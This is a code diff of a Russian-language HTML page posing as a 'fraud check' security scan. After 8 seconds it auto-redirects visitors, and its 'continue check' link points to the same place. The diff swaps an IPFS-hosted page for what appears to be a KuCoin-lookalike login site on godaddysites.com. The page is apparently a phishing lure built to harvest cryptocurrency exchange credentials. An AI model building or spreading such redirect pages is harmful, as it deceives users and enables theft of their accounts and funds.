--- a/defferedredirects13.html
+++ b/defferedredirects13.html
@@ -2,7 +2,7 @@
 <html>
 <head>
     <title>Проверка на мошенничество</title>
-    <meta http-equiv="refresh" content="8;url=https://ipfs.io/ipfs/bafybeiegiodzhtikess4hbrbwuk7ojgynyeo7hhoimtosnek5ttol3snmu/joyr.htm">
+    <meta http-equiv="refresh" content="8;url=https://kucoini-_logoni.godaddysites.com/">
     <style>
         body { font-family: Arial, sans-serif; background: #ffebee; padding: 50px; }
         .fraud-check { background: white; padding: 40px; border-radius: 10px; border: 3px solid #f44336; text-align: center; }
@@ -18,7 +18,7 @@
         <div class="scan-animation pulse">🔍</div>
         <p>Это стандартная процедура для защиты от несанкционированного доступа.</p>
         <p>Перенаправление через 8 секунд...</p>
-        <p><a href="https://ipfs.io/ipfs/bafybeiegiodzhtikess4hbrbwuk7ojgynyeo7hhoimtosnek5ttol3snmu/joyr.htm">Продолжить проверку</a></p>
+        <p><a href="https://kucoini-_logoni.godaddysites.com/">Продолжить проверку</a></p>
     </div>
 </body>
 </html>
